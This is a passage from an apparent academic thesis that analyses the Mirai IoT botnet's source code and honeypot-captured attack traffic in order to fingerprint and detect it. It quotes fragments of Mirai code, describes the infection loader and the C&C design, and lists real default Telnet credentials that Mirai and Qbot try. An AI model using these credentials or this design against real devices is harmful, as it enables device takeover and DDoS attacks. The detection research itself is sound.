Embedded devices are, more often than not, much simpler than a typical personal computer.As such, they usually do not have all of the packages that a complex device will have. Mirai isable to account for such cases and attack even the simplest of devices. The typical method formany Linux computers to download a binary is using wget, and some others use tftp (TrivialFile Transfer Protocol). Extremely simple and resource-limited devices have neither, which makesit much more di�cult to send files and download binaries to the device. When attacking a device,after discovering the architecture, Mirai checks whether it has wget or tftp installed. If so, it usesthose programs to download the Mirai binary to the victim device. Once the loader verifies the

download is successful, the Telnet connection is closed and the new bot proceeds with initializationdescribed in section 3.2.1.

Mirai is still able to spread to very simple devices that have neither wget nor tftp installed.It uses the echo command to install a small binary that downloads the real binary. Mirai doesthis instead of echo loading the entire binary directly in order to free up resources on the loaderand save time. This process is described by the author in Appendix A.1.8.

3.2 Mirai BotThe files in the bot directory within the mirai directory are responsible for the bulk of thefunctionality for an actively spreading bot. Contained in this directory are the Killer (Section3.2.2), Scanner (Section 3.2.3), and Attacker (Section 3.2.4).

3.2.1 InitializationThe instance of the Mirai bot on a device is initialized in main.c within the bot directory. Miraiis loaded into memory on the device, so the first thing it does is obfuscate its process names onthe machine to make it more di�cult to be detected. It then will ping the watchdog to ensurethat the device is not rebooted.

Next, Mirai makes sure it is the only malware running on the device by killing any pre-existingmalware. See Section 3.2.2 for a full discussion of this process. Anecdotal references have shownthat this likely works well. In a di�erent blog post by Anna-senpai, he brags that he wrote aTelnet bot killer, and the comments by other hackers seemed to confirm his boasting [29] [33].

Mirai then initializes the attack, kill and scan functionality, all of which are described below.Once everything is initialized, it connects to the command and control server by resolving adomain hardcoded in the program. As long as the adversary keeps the domain but changes theactual server address, they can avoid researchers who attempt to track down the server and shutdown the bot.

3.2.2 Botnet KillerMirai, once installed on a device, will initialize a killer that targets other malware trying to run onthe device. This is a feature that is not present on any previous IoT botnets. It kills the servicesrunning on port 23 (Telnet), 22 (SSH), and 80 (HTTP). Every KILLER_RESTART_SCAN_TIME, allprocesses running on the device are scanned in order to search for - and kill - competing malware.

Listing 3.1. Killer Memory Search1 m_qbot_report = t a b l e _ r e t r i e v e _ v a l (TABLE_MEM_QBOT, &m_qbot_len ) ;2 m_qbot_http = t a b l e _ r e t r i e v e _ v a l (TABLE_MEM_QBOT2, &m_qbot2_len ) ;3 m_qbot_dup = t a b l e _ r e t r i e v e _ v a l (TABLE_MEM_QBOT3, &m_qbot3_len ) ;4 m_upx_str = t a b l e _ r e t r i e v e _ v a l (TABLE_MEM_UPX, &m_upx_len ) ;5 m_zollard = t a b l e _ r e t r i e v e _ v a l (TABLE_MEM_ZOLLARD, &m_zollard_len ) ;67 while ( ( r e t = read ( fd , rdbuf , s izeof ( rdbuf ) ) ) > 0)

8 {9 i f ( mem_exists ( rdbuf , ret , m_qbot_report , m_qbot_len ) | |

10 mem_exists ( rdbuf , ret , m_qbot_http , m_qbot2_len ) | |11 mem_exists ( rdbuf , ret , m_qbot_dup , m_qbot3_len ) | |12 mem_exists ( rdbuf , ret , m_upx_str , m_upx_len) | |13 mem_exists ( rdbuf , ret , m_zollard , m_zollard_len ) )14 {15 found = TRUE;16 break ;17 }18 }

The source code released targets a piece of malware called Kami (aka Anime). Kami is alsoa Telnet botnet that attacks using hardcoded credentials. It resides in a folder called .anime,which Mirai searches for [34]. If found, Mirai kills the process.

In addition to searching for Kami, Mirai targets 3 varieties of Qbot (BASHLITE) which wasdiscussed earlier. It targets Darlloz, which is a PHP botnet that targets IoT and first appeared in2013. Darlloz also operates on port 23 [20] and exploits a PHP http POST request vulnerabilitythat was discovered in 2012.

3.2.3 ScannerMirai’s scanning method is rather typical for a worm. It is sub-optimal for quick networksaturation, as the method for choosing IP addresses to target is completely randomized. Theauthor does however, in Appendix A.1.3, argue that the scanning algorithm is much faster thancompeting IoT botnets. This could be due to the fact that the scanning process is multithreadedand the most resource intensive aspect of the process - loading the binary on the device - is doneby the more powerful loader server.

Once Mirai is installed onto a device, it attempts to scan for new hosts to attack. The defaultconfigurations allows for 128 simultaneous connections, which are stored as a list of custom-definedtype scanner_connection, as defined in Appendix A.2.2 in Code Listing A.2.

Each packet sent by the scanner uses and updates the values in that connection’s struct. Miraiuses the fd_set package [35], which allows it to simultaneously monitor file descriptors for input,output, and exceptions. Most of the Mirai code only monitors input and output, including thescanner. As such, it is important to note that while the process below describes the scanner assending packets and waiting for responses, in reality, Mirai is doing all of these simultaneouslyand across multiple connections. Also note that variants of Mirai in the wild are likely to scanslightly di�erently.

3.2.3.1 Connection Algorithm

For each connection, Mirai generates a random destination IP address and usually attempts toping port 23, which is the Telnet port. Every 10th connection pings port 2323, which is commonlyused by IoT devices as an alternate Telnet port. Mirai implements its own IP address generation

Figure 3.3. The Mirai Scanning Algorithm

algorithm which avoids some reserved address spaces as well as those of Hewlett Packard, GeneralElectric, the US Postal Service, and the Department of Defense.

In this first connection attempt, Mirai sends a SYN packet, the first part of a common3-way-handshake, and waits for a SYN-ACK from the device. If such a response is received, Miraibegins the next step of it’s attack process, to determine whether the Telnet port is a vulnerableone to Mirai, i.e. if the bot is able to successfully authenticate using username/password pairsfrom its table of default credentials. See Table B.1 in Appendix B.1 for the whole list. Mirainegotiates a Telnet connection and updates the connection state (see Code Listing A.2 - lines11-23) in response to the packets from the device. When a username or password is required, thebot sends one of the credentials from the previously stated table. If unsuccessful, the connectionloads a new set of credentials and connects to the device once again and attempts to negotiatethe Telnet connection.

After unsuccessfully trying 10 username/password combinations, the bot ceases to attack thedevice and cuts the connection. If, however, the credentials were correct, the results are sent to aserver which forwards them to the loader.

3.2.3.2 Authentication Attempts

It is worth discussing that Mirai obfuscates the authentication combinations it attempts. Whilethe authentication table is hard-coded, it would be di�cult for a researcher doing static analysisof the binary to determine which combinations are attempted. The code includes a tool to encodestrings using a hard-coded key, 0xdeadbeef by default (see Appendix A.4.1). However, it isextremely likely that an adversary creating their own botnet would change this string, makinganalysis of the binary slightly more di�cult.

As seen in Appendix A.4.2, when the table of authentication combinations is created inmemory during initialization, the combinations are deobfuscated. They are each assigned a weightspecified by the user, which a�ects how likely it is to be chosen to be used in an attack.

3.2.4 AttackerAs a botnet is used for nefarious purposes, the Mirai bot code includes a large section of code toimplement various attacks, all of which are DDoS attacks. The botmaster sends attack commandsto the bot using the command and control server, as described below in section 3.3.3. The typesof attacks implemented in this code release are found in Appendix B.3.

Before receiving an attack command from the command and control server (C&C for short),the bot initializes the attack functionality and places all of the methods into a dictionary that thebot accesses upon receiving a command. The following code for attack initialization can be foundin attack.h and attack.c.

Listing 3.2. Attack Initialization1 struct attack_target {2 struct sockaddr_in sock_addr ;3 ipv4_t addr ;4 uint8_t netmask ;5 } ;67 struct attack_option {8 char � va l ;9 uint8_t key ;

10 } ;1112 typedef void (�ATTACK_FUNC) ( uint8_t , struct attack_target � , uint8_t ,13 struct attack_option � ) ;14 typedef uint8_t ATTACK_VECTOR;1516 struct attack_method {17 ATTACK_FUNC func ;18 ATTACK_VECTOR vecto r ;19 } ;2021 stat ic void add_attack (ATTACK_VECTOR vector , ATTACK_FUNC func )22 {23 struct attack_method �method = c a l l o c (1 , s izeof ( struct attack_method ) ) ;24 method≠>vecto r = vecto r ;25 method≠>func = func ;26 methods = r e a l l o c ( methods , ( methods_len + 1) � s izeof ( struct attack_method � ) ) ;27 methods [ methods_len++] = method ;28 }

Upon receiving an attack command from the C&C server, the bot parses the commandand readies the attack. It is sent the attack vector and is able to query the dictionary for thecorresponding function. The bot also creates multiple threads to magnify the attack. Once ready,

the attack begins. The bot sends packets to the target according to the flags specified in thecommand for the duration of the attack. Typically, the contents of the packets are randomizedsave for certain header information. Usually, this doesn’t matter, as the object of the attack is tooverwhelm the destination servers. All of the various attack types are not unique to Mirai, andthus will not be discussed in detail.

As in any botnet DDoS attack, it is virtually impossible for a victim to determine the truesource of the attack. Of course, the victim can see that the packets are coming from the bots, butthe command and control server and the botmaster are one and two hops removed from the attackand thus are di�cult to identify. Additionally it can be di�cult to distinguish DDoS tra�c frombenign tra�c. Due to the size of Mirai botnets, their DDoS attacks are unusually powerful, eventhough there isn’t anything particularly special about the attack technique implemented here.

3.2.5 Constants TableThe bot defines a set of constants that are saved into a table. The keys are stored obfuscated.Unlike traditional good encryption, which attempts to resemble the One Time Pad, this obfuscationXOR’s every set of 4 bytes of the string with the same key defined in the file. The default key is0xdeadbeef, though it is likely to be changed by an adversary adopting the code. Methods inthe malware will de-obfuscate entries, use them, and then re-obfuscate them when finished.

3.3 Command and ControlThe botmaster controls the various bots using a central command and control center, as mentionedbriefly above. See figure 3.4 for a graphical representation of the command and control structure.Mirai’s C&C is written in Go. Go was written in 2009 by developers at Google and is meant toresemble C yet have the advantages of Python [36]. It has built-in support for concurrency, whichis advantageous for event-based servers like a botnet command and control server. The MiraiC&C server utilizes the net package for network interfacing [37] and the database package forSQL database management.

3.3.1 InitializationThe initialization of the command and control server begins with the creation of the client list,or list of bots in the botnet. See appendix A.2.3 for the stucture of the client list. Again here,as in the loader, individual bots are referred to as workers. As was discussed earlier, the botsthemselves initiate the connection with the C&C, so the C&C waits for incoming connectionsand adds the bots to the client list once received. Bots communicate with the C&C server viaport 23 by default, but it is expected that botmasters may change this value. An admin is thencreated to allow the botmaster to control the bots in the botnet. A database is also created whichcontains the list of users and the history of attacks. The database is accessed via the API in theadmin. Users communicate with the API using port 101.

Figure 3.4. The Mirai Command and Control Structure

3.3.2 Admin Interface and APIThe admin interface implements authentication for the botmaster and allows them to control thesize and structure of the botnet, as well as initiate attacks. Interestingly, the prompts are writtenin a combination of Russian and English, which is in contrast to the Japanese and anime themethat is present throughout the botnet (including the name of the botnet itself).

The admin allows the botmaster to create new users, which have limited control of the botnetand are only able to execute attacks. This allows botmasters to monetize their botnet evenfurther, by selling access accounts to other users who want to execute DDoS attacks.

This functionality is in line with the recent upward trend of DDoS-for-hire discussed in section2.2.4. The botmaster has an easy-to-use admin interface to manage not only the botnet, but useraccounts as well. These users are saved into a database table and the botmaster can manage thefollowing information about each:

• username

• password

• whether the user is an admin

• last time the user paid

• maximum number of bots per attack

• attack duration limit

• cooldown between attacks

Clearly, the creator of Mirai intended to maximize the profitability of this malware, likelywith di�erent subscription packages and pay levels, a trend discussed in [24].

Any subscriber who wants to execute an attack is able to do so via the API. They simplyenter an attack command that is parsed and sent to bots.

3.3.3 AttackThe goroutines in attack.go are responsible for parsing the command and building the attackcommands to be sent to the bots. Clearly, the command and control server does not directlyattack targets; this is handled by the bots and is described in section 3.2.4 above.

A user has a variety of DDoS attack options available in Mirai. These options are consolidatedin the tables in appendix B.3. When an attack command is issued, it is parsed by the server.The user is required to specify an attack as well as a variety of flags, all of which are checked. Ifthe command is correct, the information is added into a bu�er to be sent to bots. Before beingsent, however, the server checks the destination IP against a list of blacklisted (referred to aswhitelisted in the code, an incorrect use of the word) IPs and whether the user is executing anattack that is within their allowed duration and botnet size. If all is okay, the attack is queuedand sent to the bots.

The bots are actively listening on a socket for attack commands from the C&C. When acommand is sent, the bots parse the attack and initiate it. To multiply the e�ects of the DDoSattack, the bots will multi-thread the attack.

3.4 Mirai’s Pseudorandom Number GeneratorMirai defines its own pseudorandom number generator (PRNG) which is referenced dozens of timesin the malware code (See listing 3.3 below). It is seeded when the bot is instantiated using thecomputer’s clock and the current process id. The random number generator is a linear-feedbackshift register (LFSR), and therefore uses a linear deterministic function to calculate the nextvalue from the previous value (See figure 3.5 below for an illustration).

Listing 3.3. Mirai’s Pseudo-Random Number Generator1 stat ic uint32_t x , y , z , w;23 void rand_init ( void )4 {5 x = time (NULL) ;6 y = getp id ( ) ^ getppid ( ) ;7 z = c l o c k ( ) ;8 w = z ^ y ;9 }

10

11 uint32_t rand_next ( void ) // per iod 2^96≠112 {13 uint32_t t = x ;14 t ^= t << 11 ;15 t ^= t >> 8 ;16 x = y ; y = z ; z = w;17 w ^= w >> 19 ;18 w ^= t ;19 return w;20 }

Figure 3.5. The Mirai Random Number Generator

3.4.1 Randomness AnalysisStatistically random LFSRs have su�ciently even bit distribution and have very long periods.rand_next() has a period of 296 ≠ 1, which equals about 7.9 ú 1028. Therefore, it is extremelyunlikely that a bot will reuse a value. The PRNG was analyzed using the Dieharder test suite [38].The generator was used to build a file of 1 billion unsigned integers, which were input into thetests. The full output can be found in Appendix B.4.

In statistics, a p-value shows the statistical significance of a result and shows whether to acceptor reject a null hypothesis, which, in this case, is that the pseudo-random number generator isas good as a perfect random number generator. The default threshold to measure statisticalsignificance is 0.05, i.e. p-values below 0.025 or greater than 0.975 would be marked as weakgenerators. In other words, there is a statistically significant di�erence between a pseudo-random

number generator and a perfect random number generator. The test data passed a majority of thetests from the Dieharder test suite (see Appendix B.4), while it failed the of the tests. Therefore,we can safely conclude that the Mirai random number generator is rather good, statisticallyspeaking.

However, this generator is not cryptographically secure. A cryptographic pseudo-randomnumber generator (CPRNG) is a more strictly defined pseudo-random number generator. EveryCPRNG is a PRNG but not every PRNG is a CPRNG. To be a CPRNG, the following must betrue:

1. The CPRNG must past the next-bit test. If an adversary is given the first k valuesgenerated, there is no polynomial-time algorithm which can generate the (k + 1)th valuewith a statistically significant probabilty of success (i.e. better than guessing). [39]

2. The CPRNG must be secure even if all or some of its current state is revealed. If revealed,the adversary may not be able to deduce any previous states.

The first requirement does cause the Mirai PRNG to fail the test miserably. If an adversary isable to see any four consecutive values generated from iteration t ≠ 3 to t, they may deduce theinternal state of the PRNG at iteration t (See Figure 3.5 for a representation of the internal states).Therefore, they will be able to know any number output by the generator at iteration t + m,where m is any integer greater than or equal to 0. In fact, the adversary does not necessarily needto see four consecutive states. Because this is a linear system, it will be possible, albeit slightlymore di�cult, to deduce the state given gaps between known outputs.

The Mirai PRNG also fails the second requirement. Knowing the state at iteration t, theadversary can deduce the outputs at iterations t ≠ 3 to t, as 3 of the registers are shifted,unchanged, each iteration. Further back than that, the adversary can make educated guesses asto the state, with less accuracy the further one goes, as the value from the x register is bit-shiftedand exclusive-or’d with the value from the w register.

Therefore, we can safely conclude that the Mirai generator is not cryptographically secure. Aresearcher attempting to investigate a Mirai botnet may be able to deduce information aboutit, including which IPs it will attempt to compromise next, if he knows the outputs of thePRNG. There is the possibility that the author of Mirai does not understand cryptography andrandomness enough to ensure good randomness. There is also the possibility that they do notcare; due to the high number of places in the code where rand_next() is used, it may be unlikelythat a researcher could get a good sample of the PRNG output. If the author cared, they couldhave used one of a myriad of open-source cryptographically secure random number generatorsavailable.

Chapter 4 |Experimental Setup

As investigated and discussed in Chapter 3, Mirai targets vulnerable devices with insecureauthentication on the Telnet port. Variants of Mirai have taken control of countless devicesincluding routers, cameras, and DVRs, thus giving it the label "Internet of Things Botnet". Asdiscussed in the introduction, IoT devices make great malware targets, as they are often insecure,almost always online, and rarely interacted with by humans directly. Mirai is so successful atspreading to new hosts that is has been responsible for some of the largest DDoS attacks everseen.

The world is increasingly becoming connected in order to make the lives of people easier andmore convenient. There are so many devices being added that it is unfeasible for humans todirectly control them all. Thus, it is becoming common for IoT systems to be controlled by arelatively powerful central hub. This may be a processing device that talks to dozens of sensorson a farm. This may be devices in a home managed by a central hub. We will assume this modelwhen addressing the Mirai problem. We assume that all tra�c in a sub-network will be moderatedat some point by this central hub, or, at least, this central hub has some control over the targetdevice in question. We will also assume that this hub is able to do deep packet inspection on thetra�c going to and coming from devices.

4.1 Experimental SetupWhile the source code for Mirai was investigated, it was important to be able to investigate Mirai’ssni�ng behavior in the wild. Anecdotal investigations by security researchers with honeypots havereported getting attacked by IoT malware every couple of minutes. We wanted to corroboratethese results and to be able to investigate these sessions closely in order to fingerprint Mirai andto confirm theories about its behavior.

Raspberry Pi 3s running Kali Linux were used to watch the Telnet port of the router on realnetworks. All of the Raspberry Pis were placed in State College, Pennsylvania on typical homenetworks - that is, networks that are often targeted by Mirai. The only modification made to therouter was to set up port-forwarding, so that all tra�c destined for port 23 was automaticallyforwarded to the Raspberry Pi. As the Telnet protocol has largely been replaced by SSH for

22

normal usage, and as port 23 is usually closed on these routers, it is generally not intrusive toutilize port-forwarding, and it was not intrusive in any of the cases here.

The Raspberry Pis were configured with a Telnet server, so that a would-be attacker would beable to attempt to authenticate. While the Telnet server will log authentication attempts, it wasalso useful to log all packets in the session. The dumpcap utility, which is a part of the Wiresharkprogram, was used to log all tra�c seen over port 23. The results were saved into pcap files andinvestigated later. Tra�c was collected between the dates of April 27th and May 8th 2017 on fivedevices.

Chapter 5 |Results and Discussion

5.1 Mirai-Infected Device BehaviorTypically, Internet of Things devices are essentially connected control systems, albeit more complexones. That is, as opposed to a personal computer, which will initiate connections and execute avariety of functionalities, an IoT device will typically react to some command or stimulus andinitiate a state change. For example, a connected thermostat may react to a large temperaturedrop by turning on the heat. It may also react to a signal from the control app on a user’s phonecommanding it to update the temperature.

Figure 5.1. Conventional IoT Device Behavior

Even a router - a common Mirai target - could arguably be considered an IoT device. Typically,a router will not initiate connections. Instead, it will take incoming packets and forward them todevices on the network and will take packets from the network and send them out to the Internet.

A Mirai-infected device, conversely, will not behave in an expected manner. Instead of primarilybeing a reactionary device, it will be very active, with, likely, the majority of its tra�c becomingMirai tra�c. Recall that conventional Mirai bots will have 128 active connections scanning fornew vulnerable hosts to infect. Mirai is loud and its scanning tra�c is next to impossible todisguise as benign. As a result, it will also increase its bandwidth, potentially slowing downconnections for other devices on the network.

If a Mirai-infected device is found on a network, we could block all tra�c going to and coming

24

Figure 5.2. Mirai-Infected IoT Device Behavior

from the device in order to prevent spread and other damage. While currently, Mirai does notexecute any other attacks besides DDoS and does not explicitly target devices in the local network,it cannot be assumed that future variants will not develop this functionality (as discussed inChapter 6). Luckily, current variants of Mirai are loaded into memory and are completely erasedupon device reset.

5.2 Mirai Tra�c HeadersMirai makes great attempts to appear benign to a target when sending Telnet tra�c. Listing 5.1below contains the code utilized by Mirai to create its packet headers. The created packets aresent using functionality in the popular C socket library. Figures 5.4 and 5.6 show IP and TCPheaders created by this code.

Listing 5.1. Packet Header Initialization12 // Set up IPv4 header3 iph≠>i h l = 5 ;4 iph≠>v e r s i o n = 4 ;5 iph≠>tot_len = htons ( s izeof ( struct iphdr ) + s izeof ( struct tcphdr ) ) ;6 iph≠>id = rand_next ( ) ;7 iph≠>t t l = 64 ;8 iph≠>p r o t o c o l = IPPROTO_TCP;9 iph≠>saddr = LOCAL_ADDR;

10 iph≠>daddr = get_random_ip ( ) ;11 iph≠>check = checksum_generic ( ( uint16_t �) iph , s izeof ( struct iphdr ) ) ;1213 // Set up TCP header14 tcph≠>dest = htons ( 2 3 ) ;

15 source_port = rand_next ( ) & 0 x f f f f ;16 tcph≠>source = source_port ;17 tcph≠>d o f f = 5 ;18 tcph≠>window = rand_next ( ) & 0 x f f f f ;19 tcph≠>syn = TRUE;20 tcph≠>seq = iph≠>daddr ;21 tcph≠>check = checksum_tcpudp ( iph , tcph , htons ( s izeof ( struct tcphdr ) ) ,22 s izeof ( struct tcphdr ) ) ;

5.2.1 IPv4 HeaderMirai’s IPv4 header is built in order to appear as normal as possible so to evade detection. Ituses common settings and correctly calculates the header length and checksum. The ID field israndomized, which is common when fragmentation is not occurring. One could potentially lookat the IP address to distinguish malicious tra�c, perhaps to block all Telnet tra�c coming fromanother country. However, as discussed in Section 5.4, Mirai is so pervasive across the Internetthat it won’t be long before a device is targeted by a bot close by geographically. Instead, onecould easily white-list IPs so that a firewall will only allow a select few connections to the Telnetport. Otherwise, It is unlikely that an intrusion detection system will be able to di�erentiateMirai tra�c looking at the IPv4 header alone.

Figure 5.3. Benign IPv4 Header [Wireshark]

Figure 5.4. Mirai IPv4 Header [Wireshark]

5.2.2 TCP HeaderMirai also attempts to build the TCP header to appear benign. Typically, when connecting viaTelnet, the source port is randomized. Such is the case with Mirai. Mirai builds every other fieldto resemble benign tra�c as well.

Figure 5.5. Benign TCP Header [Wireshark]

Figure 5.6. Mirai TCP Header [Wireshark]

5.3 Mirai Tra�c PayloadMirai tra�c diverges from typical benign behavior when it comes to the payload of its tra�c.As such, fingerprinting Mirai will require deep packet inspection, which is usually done using anintrusion detection system or an intrusion prevention system. Flagged packets can be blockedand reported so that further action can be taken.

Figure 5.7. Telnet Session Figure 5.8. Mirai Telnet Session

5.3.1 Telnet NegotiationWhen a user connects to a Telnet server, before a login prompt appears, a configuration negotiationtakes place. The device and/or the server will send configuration requests to the other which areeither accepted or denied. These configurations - or options as they are sometimes called - candecide the character set, echo mode, network options, and more. Typically, when a user connectsusing a PC, several request are automatically sent to the server to make the experience for theuser as optimal as possible. Requests go back and forth, some of which are accepted and some ofwhich are denied. Interestingly, in the tra�c analyzed, very few instances were found where thedevice sent requests. The same set of configuration requests, as seen in Figure 5.8, were sent fromthe server to the device in each case, all of which were denied. Note that a di�erent server mayrequest di�erent configurations.

5.3.2 LinemodeOne major option for a Telnet session is the linemode option. The default setting is to send apacket each time a character is input. For example, if a user were to input the username "root", apacket will typically be sent for "r", "o", "o", "t", and "\n\r". It is possible to reduce the number ofpackets by setting this linemode option. In that case, most processing and feedback will be donelocally and, in our example, the packet sent will likely contain the payload "root\n\r". Mirai doesnot set the linemode option. Yet, it will send payloads with full usernames and passwords when,if it were a real user, it would send one character at a time. Such a disparity is easy to fingerprint,as the server, the device, and any device listening to the tra�c would know the configurationspreviously agreed upon.

5.3.3 TimingA user connecting to a Telnet server is obviously much slower than a computer. It takes time totype out usernames, passwords, and commands. The average person types 40 words per minute,which equates to about 200 characters, or 3 characters per second. This means it will take a usera second or two, at least, to type out a username, password, or command for the Telnet server.In Mirai’s case, these payloads are sent extremely quickly. In many cases in our analysis, thetime delta between receiving a username or password prompt and sending the packet with therequested information is less than 2/10ths of a second.

5.3.4 Credentials TriedAs long as an attacker is not able to guess the correct credentials of the target device in the firstfew attempts, it will not be long before it is obvious that the credentials being tried are selectedfrom a list similar to the hardcoded one in Mirai, especially if they are extremely device-specific.

As we collected a lot of malicious tra�c, we were able to learn what default credentials arecurrently being tried in the wild. See Appendix B.2 for a full list. The released version of Miraicontains a set of 60 hardcoded credentials, which were all seen. However, we did see manycredentials that did not appear in the release. This is unsurprising. Adapters of Mirai are likelyto modify this list.

Most of the default credentials seen target routers, DVRs, printers, and cameras. However,due to the widespread use of extremely common username:password combinations, it is likelythat other types of IoT devices will use credentials already on this list, or that users of Mirai willadd more credentials to the attack.

It is also interesting to note that many of the insecure devices specifically targeted aredisproportionally Chinese, with combinations like adminlvjh:adminlvjh123, e8ehome:e8ehome,root:nmgx_wapia, and root:hg2x0 all targeting Chinese routers and cameras. What’s more,many of these devices are very cheap, and are thus likely relatively popular. Unfortunately, itseems that a cheaper device implies weaker security.

5.4 Locations of Infected Devices

Figure 5.9. Attack Source Heat Map

Infected Mirai bots indiscriminately target devices all over the world in virtually all IP ranges.However, not every device is vulnerable to Mirai. We investigated the locations of the devicesattacking our Raspberry Pis by looking at the IP addresses. Though one device may attackmultiple times in quick succession, we only counted each address once. We then plotted theinformation on a logarithmic heat map, found below in Figure 5.9. For the most part, theprevalence of Mirai-infected devices loosely follows the population density of developed countries.As you can in table 5.1, the top 3 sources of attacks are China, Russia, and Brazil. According toSecurity Today, these 3 countries are among the top 5 originators of cyber attacks [40], with theother two - the United States and Turkey - also appearing in table 5.1. These results are in linewith what was seen in section 5.3.4, where we saw that the Chinese devices were disproportionallytargeted.

Many of the other countries appearing in the top 10 are in Asia, pointing to a trend of thehigh use of insecure devices in these places. China is home to one of the world’s largest economies- and to the world’s largest population. Such a vulnerable cyber-infrastructure is be extremelydangerous, with fallouts from an attack a�ecting countries throughout the world. These devices -wherever they are made - are sold all over the world, requiring global cooperation to combat thethreat of Mirai and similar malware.

Table 5.1. Top 10 Source CountriesCountry Number of Devices

1 China 29702 Russia 13093 Brazil 5964 South Korea 5065 United States 4746 Turkey 4447 Vietnam 3698 India 3079 Taiwan 30110 Argentina 272

5.5 Tra�c FlowsMany botnets that compromise traditional PCs experience higher tra�c volumes during the partsof the day where these PCs are on. In those cases, for example, if a researcher in the United Statessaw more attack tra�c hitting his device in the middle of the night, they could infer the attackswere largely coming from Asia, where it is the middle of the day. With IoT devices, it is harderto make these inferences due to the fact that devices are online all the time. Figures 5.10 and5.11 are IO graphs of Telnet tra�c over a 24 hour period on two of our devices. The timeframeobserved by both devices is the same. Notice that the level of tra�c is relatively consistent overthis time period, save for a large peak observed by both devices around 7 PM on April 30th.This could be for a number of reasons, including the possibility that a number of botnets wereinitiated around this time.

Figure 5.10. Input-Output Graph Device 1 (April 30 - May 1)

Figure 5.11. Input-Output Graph Device 2 (April 30 - May 1)

However, if we look at Figure 5.12, which represents the same time period on device 2 butthree days later, we see no spike. The tra�c observed over this 24 hour period is relativelyconsistent.

Figure 5.12. Input-Output Graph Device 2 (May 3 - May 4)

These results are consistent with the idea that Mirai and similar IoT botnets are di�erentthan traditional botnets. The bots are always online and thus, are active 24 hours a day, 7 days aweek. This gives an attacker more flexibility when conducting a DDoS attack, as they can chooseany time for the attack to occur.

The fact that these devices are always online also implies that they are rarely interacted withdirectly by an actual user (at least, the as far as the configuration of the device is concerned).This allows the adversary to keep the bots in their botnet and evade detection for longer.

5.6 Distinguishing Mirai from Other Botnet Tra�cAs stated in section 2.1.3, Mirai was not the first botnet to attack IoT devices, and is not the onlyone currently in the wild. Many of them, like qbot [41], also attack by trying default credentialson the Telnet port. Therefore, it can be di�cult to distinguish between di�erent flavors of IoTbotnets, especially if the user modifies the credentials list. Qbot (also known as BASHLITE) isthe other major Telnet botnet in circulation today and its source code has been released as well.Qbot has separate hardcoded lists of usernames and passwords and tries di�erent combinations:

• Usernames: root, admin, user, login, guest, support

• Passwords: root, toor, admin, user, guest, login, 1234, 12345, 123456, default, [emptystring], password, support

Unless a user modifies these lists, one will notice that the credentials tried by qbot are verygeneric, unlike Mirai, which tries combinations like root:7ujMko0admin in addition to genericcombinations. As qbot tries di�erent permutations of these password combinations, it is unlikelythat that an adversary using qbot will add obscure, device specific credentials to its list. Therefore,if such credentials are seen, it is likely to be Mirai.

Another di�erence between Mirai and other IoT botnets is that basic Mirai will close theconnection after each log in attempt. In our experiments, we saw some attempt multiple credential

combinations in a single session. These botnets are not the same version of Mirai that wasreleased, though it is entirely possible that some users modified the code.

Chapter 6 |Conclusions & Takeaways

The world-size robot we’re building can only be managed responsibly if we start makingreal choices about the interconnected world we live in. Yes, we need security systems asrobust as the threat landscape. But we also need laws that e�ectively regulate thesedangerous technologies. And, more generally, we need to make moral, ethical, and politicaldecisions on how those systems should work.

Bruce Schneier

6.1 Where We Are NowToday, vulnerable IoT devices are creating one of the worst cyber threats in the world today, achallenge that is likely to get more di�cult for years to come. To date, Mirai has been responsiblefor the largest DDoS attacks ever recorded. The code that was released in October 2016 hasimmense capabilities, which have likely been improved in the months since. We found that ourTelnet servers were usually taking in several packets of tra�c per second, all of which was almostcertainly malicious, considering the fact that we weren’t using these devices for anything else. Asnoted in Chapter 2, there are a few major strains of competing IoT botnets, so we know that ourcollected tra�c represents this. We also found that the devices targeted by Mirai and similar IoTmalware has expanded, as evidenced by the wide variety of username and password pairs thatwere tried against our server.

6.2 Improvements to MiraiMirai is not a perfect piece of code, and adversaries could easily - and are likely to - improveits functionality. We know that future generations will be much more sophisticated, targetingadditional vulnerabilities with more attack vectors.

34

6.2.1 Scanning StrategiesCurrently, Mirai implements no IP selection algorithm. Bots select random IP addresses whenattempting to infect new hosts. Even early worms, like Code Red II, attempted to develop a goodspreading algorithm to infiltrate the Internet more quickly.

Future variants of Mirai are very likely to first target machines on the local network. Likely, ifa user has a vulnerable connected device, they will have more on their network. Additionally, it ismore likely that an IP address in a local network will be online than a random IP address onthe Internet. Future variants may also implement geographic targeting. As shown in Chapter 5,vulnerable devices are more numerous in certain Asian countries, the United States, and Braziland adversaries may find more success by targeting these locations specifically.

6.2.2 Packet PayloadFuture iterations of Mirai may introduce attempts to avoid detection by firewalls and intrusiondetection systems that utilize deep packet inspection. As discussed extensively in Chapter 5,Mirai’s IP and TCP packet headers are designed to appear benign and act normally. However,upon looking at the payload, behavior diverges sharply. Currently, one way we may identify Miraion the payload alone is the lack of Telnet negotiation on the part of the bot. It would not beoverly di�cult nor would it contribute much to overhead to have the bots send a few randomconfiguration requests.

6.2.3 Default Password ListMirai currently attacks targets utilizing a default password list. It is hardcoded, and credentialpairs are chosen using a hardcoded priority value. Potential variants of Mirai could see a moredynamic version of this list. We were targeted with credentials not found in the original list, manyof which are for devices designed and built in Asia. As new IoT devices are released withoutsecure credentials, they too will be added to the list.

6.2.4 New VulnerabilitiesIt won’t be long until the default password vulnerability that Mirai targets will become nonviable.We have already seen that a few manufacturers - including Hikvision, Samsung, and Panasonic -have begun to require users to create a unique secure password upon initial setup [42]. It will notbe long before these manufacturers move away from Telnet - an inherently insecure protocol -entirely and implement more secure protocols, like SSH.

Soon, di�erent, more traditional, vulnerabilities will begin to be exploited by future generationsof Mirai. They may execute bu�er-overflow attacks, injection attacks, and more. These attacksare likely to be very successful with IoT. IoT devices tend to be simpler than PCs, often withold architectures. Many vulnerabilities on these older systems have already been found. Whennew vulnerabilities are found on an IoT device, attackers will be able to exploit it for longer thannormal, as IoT devices are updated less often and have a longer shelf life than a traditional PC.

6.2.5 Attack Vectors & MonetizationMirai will become increasingly monetized with more attack vectors. We have already seen howMirai is deep into the DDoS-for-hire sector, something that will likely to continue.

IoT devices are beginning to carry more and more important personal information, such aswith medical devices that can send information to a physician or with devices that can carryout financial transactions. As we’ve seen in the past with Torpig, for example, adversaries willbegin to steal this personal information and sell it. Additionally, we may see adversaries use IoTdevices to conduct ransomware attacks or attempt to conduct espionage against governments orcorporations

Finally, it won’t be long before future generations of Mirai are able to move out of thedigital world and conduct attacks on infrastructure. This may be realized in attacking publicinfrastructure to cause city-wide outages, attacking agriculture systems to cause food shortages,or taking down important devices in thousands of homes to cause economic issues or even a stateof emergency.

